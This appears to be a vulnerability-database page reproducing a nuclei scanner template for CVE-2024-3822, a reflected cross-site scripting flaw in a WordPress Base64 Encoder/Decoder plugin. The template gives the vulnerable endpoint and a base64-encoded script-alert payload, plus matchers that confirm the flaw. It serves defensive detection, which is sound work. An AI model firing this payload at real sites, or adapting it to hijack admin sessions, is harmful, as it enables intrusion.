Lucene search
K

Base64 Encoder/Decoder <= 0.9.2 - Cross-Site Scripting

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 77 Views

Base64 Encoder/Decoder <= 0.9.2 Plugin XS

Related
Refs
Code
id: CVE-2024-3822

info:
  name: Base64 Encoder/Decoder <= 0.9.2 - Cross-Site Scripting
  author: omranisecurity
  severity: medium
  description: |
    The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript to target high-privilege users like administrators, potentially leading to session hijacking, privilege escalation, or administrative account compromise.
  remediation: |
    Upgrade to the latest version of the Base64 Encoder/Decoder plugin that addresses this XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3822
    - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2024-3822
    cwe-id: CWE-79
    epss-score: 0.00741
    epss-percentile: 0.50119
  metadata:
    verified: true
    max-request: 1
    fofa-query: "wp-content/plugins/base64-encoderdecoder/"
  tags: cve,cve2024,wordpress,wp-plugin,wp,xss,base64-encoderdecoder,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgiZG9jdW1lbnQuZG9tYWluIik8L3NjcmlwdD4="

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/html")'
          - 'contains(body, "<p><script>alert(\"document.domain\")</script></p>")'
        condition: and
# digest: 490a0046304402201879a0f13a4a5335c46d3f8e0d16fc38d03eb5fc5d1b58b9259a8b8b8ae4860502202de8a5e6cd423f7baea8deb33ac34af351f593a06208da2d1d49d8f41465efea:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.14.8
EPSS0.00741
SSVC
77